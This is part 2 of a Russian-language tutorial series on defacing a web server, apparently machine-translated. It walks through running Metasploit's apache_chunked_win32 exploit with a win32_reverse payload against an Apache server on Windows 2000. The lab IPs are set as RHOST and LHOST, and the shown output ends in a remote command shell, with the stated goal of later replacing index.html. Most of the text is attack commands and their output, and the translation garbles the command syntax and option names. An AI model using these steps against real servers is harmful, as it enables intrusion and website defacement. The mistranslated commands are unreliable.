Дефейс веб-сервера (часть 2)

Опубликовано: 13 Апреля, 2023

Дефейс веб-сервера (часть 2)

Я быстро подытожу с того места, на котором остановилась первая часть этой серии статей. В первой части было кратко описано, как можно стереть веб-сервер, и был представлен инструмент, который мы будем использовать для самостоятельного выполнения такого стирания. Прежде чем мы продолжим, я хотел бы еще раз отметить, что воссоздание эксплойтов или, в данном случае, дефейсов веб-сервера, является законным упражнением в компьютерной безопасности. Однако это необходимо делать в компьютерной лаборатории, как подробно описано в первой части. Недостаточно просто знать, как что-то работает, в идеале нужно уметь заставить это работать самостоятельно. На этой ноте давайте продолжим использовать инструмент Metasploit, чтобы углубить наше понимание искажений веб-сервера.

От теории к реальности

С этого момента мы продолжаем изучать инструмент Metasploit и то, как он используется. Именно с помощью этого инструмента мы получим доступ на системном уровне к веб-серверу Apache. Получение обратной оболочки — это то, что позволит нам загрузить наш измененный файл index.html, который является страницей по умолчанию, обслуживаемой веб-сервером, например: журнал вашей компании.

Ниже показано, что даст вам команда «показать эксплойты» при вводе в приглашении msf в Metasploit. Появится список доступных эксплойтов.

msf > показать эксплойты

Загруженные эксплойты Metasploit Framework
=====================================

Кредиты Кредиты платформы Metasploit
afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Фрагментированное кодирование Apache Win32
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec Выполнение команды демона DistCC
exchange2000_xexch50 Exchange 2000 MS03-46 Переполнение кучи
frontpage_fp30reg_chunked Начальная страница fp30reg.dll фрагментированное кодирование
ia_webmail IA WebMail 3.x Переполнение буфера
iis50_nsiislog_post Переполнение POST IIS 5.0 nsiislog.dll
iis50_printer_overflow Переполнение буфера принтера IIS 5.0
iis50_webdav_ntdll Переполнение IIS 5.0 WebDAV ntdll.dll

Итак, мы видим, что перечислены несколько эксплойтов, доступных в рамках фреймворка. Я сократил список, но когда вы введете ту же команду, что и я, вы получите полный список. Мы собираемся использовать второй сверху: apache_chunked_win32.

Теперь я введу команду, чтобы выбрать эксплойт, который мы собираемся использовать, как показано ниже.

msf> используйте apache_chunked_win32
msf apache_chunked_win32 >

Как видно выше, наше приглашение возвращается, и оно показывает, что мы используем выбранный нами эксплойт: apache_chunked_win32. Отсюда мы теперь введем указанную ниже команду, чтобы проверить различные параметры, связанные с этим эксплойтом в рамках.

msf apache_chunked_win32> показать параметры

Параметры использования
===============

Эксплойт: Имя По умолчанию Описание
——— —— ——- ——————
по желанию SSL Использовать SSL
требуется РОСТ Целевой адрес
требуется ОТЧЕТ 80 Целевой порт

Цель: Windows NT/2K Brute Force

msf apache_chunked_win32>

Теперь у нас снова есть приглашение и список параметров, которые нам нужно заполнить, например, IP-адрес удаленного хоста. Обратите внимание, что вам также потребуется ввести IP-адрес локального хоста, т. е. адрес вашей атакующей машины в настройках лаборатории. Вам необходимо ввести команды для установки этих параметров, как указано ниже;

msf apache_chunked_win32 > установить RHOST 192.168.1.101
РОСТ -> 192.168.1.101
msf apache_chunked_win32 >

Мы установим параметр LHOST чуть позже в этой статье.

Вы бы посмотрели на эти варианты эксплойтов!

Теперь мы установили это поле, и нас снова ждет подсказка. Отсюда мы перейдем к другим различным параметрам, которые нам нужно установить, прежде чем использовать этот эксплойт, чтобы получить доступ на системном уровне к веб-серверу. В нашем случае мы теперь будем использовать следующую команду, чтобы увидеть, какие полезные нагрузки мы можем использовать.

msf apache_chunked_win32 > показать полезные нагрузки

Используемые полезные нагрузки Metasploit Framework
=====================================

win32_bind Оболочка привязки Windows
win32_bind_dllinject Внедрение Windows Bind DLL
win32_bind_stg Оболочка поэтапной привязки Windows
win32_bind_stg_upexec Загрузка/выполнение поэтапной привязки Windows
win32_bind_vncinject Внедрение DLL сервера Windows Bind VNC
win32_reverse Обратная оболочка Windows
win32_reverse_dllвнедрить Обратное внедрение DLL в Windows
win32_reverse_stg Поэтапная обратная оболочка Windows
win32_reverse_stg_ie Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Поэтапная обратная загрузка/выполнение Windows
win32_reverse_vncinject Инъекция DLL обратного VNC-сервера Windows

msf apache_chunked_win32>

Вау! Неплохой выбор для игры, не так ли? Это действительно часть красоты Metasploit Framework. Это позволит вам использовать любое «яйцо», которое вы выберете. Под «яйцом» я подразумеваю любую полезную нагрузку, которую вы будете выполнять на ЦП жертвы после того, как воспользуетесь уязвимостью, на которую нацелены. Наличие такого широкого выбора является одним из замечательных применений этого инструмента безопасности.

Из того, что мы видим выше, нам доступно множество вариантов. В нашем случае мы будем использовать полезную нагрузку win32_reverse. Почему? Ну, нам нужна оболочка, которую мы можем использовать для пересылки вещей туда и обратно. Чтобы быть точным, мы хотим скопировать файл index.html и внести в него некоторые изменения, т.е. исказить его. Наличие оболочки позволит нам сделать именно это. Что ж, в этой заметке нам нужно сообщить Framework, что нам нужен этот вариант полезной нагрузки. Пожалуйста, смотрите ниже синтаксис.

msf apache_chunked_win32 > установить ПОЛЕЗНУЮ НАГРУЗКУ win32_reverse
ПОЛЕЗНАЯ НАГРУЗКА -> win32_reverse
msf apache_chunked_win32 (win32_reverse) >

Итак, теперь мы установили эту полезную нагрузку и вернули нашу подсказку. Что делать дальше? О да! Нам нужно установить IP-адрес для получения обратного шелла. Помните, несколько шагов назад мы установили RHOST, чтобы указать атакуемую машину? Ну, нам также нужно сделать то же самое, чтобы установить хост-получатель. Пожалуйста, смотрите ниже.

msf apache_chunked_win32(win32_reverse) > установить LHOST 192.168.1.102
ЛХОСТ -> 192.168.1.102
msf apache_chunked_win32 (win32_reverse) >

Теперь мы готовы запустить эксплойт. Синтаксис для этого показан ниже.

msf apache_chunked_win32(win32_reverse) > эксплойт 192.168.1.101
[*] Запуск обратного обработчика.
[*] Попытка использовать Windows 2000 с возвратом 0x1c0f143c с заполнением 348…
[*] Попытка эксплойта Windows NT с возвратом 0x1c0f1022 с заполнением 348…
[*] Попытка использовать Windows 2000 с возвратом 0x1c0f143c с заполнением 352…
[*] Попытка эксплойта Windows NT с возвратом 0x1c0f1022 с заполнением 352…
[*] Попытка взлома Windows 2000 с возвратом 0x1c0f143c с заполнением 356…
[*] Попытка взломать Windows NT, используя return 0x1c0f1022 с заполнением 356…
[*] Попытка взломать Windows 2000, используя return 0x1c0f143c с отступом 360…
[*] Есть соединение с 192.168.1.101:1031








Microsoft Windows 2000 [версия 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:Program FilesApache GroupApache>

Итак, выше мы видим, что теперь у нас есть командная строка в самом каталоге Apache. В этом случае мы могли использовать еще один вариант; это «целевой» параметр для указания используемой операционной системы. Даже если не указано, он попытается сделать все, что может. Чтобы использовать целевую опцию, сделайте следующее;

msf apache_chunked_win32 (win32_reverse) > показать цели

Затем появится список целей. Все, что вам нужно сделать, это выбрать тот, который вы хотите, и установить его, как мы сделали выше;

msf apache_chunked_win32(win32_reverse) > установить ЦЕЛЬ 1

Это войдет в цель 1, которая, если мне не изменяет память, является W2K Pro.

Что ж, пока мы проделали изрядный объем работы. Веб-сервер Apache был скомпрометирован нами, и у нас есть обратная оболочка, как показано выше. С этой обратной оболочкой и доступом на системном уровне машина полностью принадлежит нам, чтобы играть и манипулировать ею. Итак, на этой ноте мы закончим вторую часть этой серии статей и продолжим в последней части. В третьей части мы на самом деле займемся дефейсом веб-страницы, а также заглянем внутрь атаки. Тогда увидимся!

искажений веб-сервера (часть 1)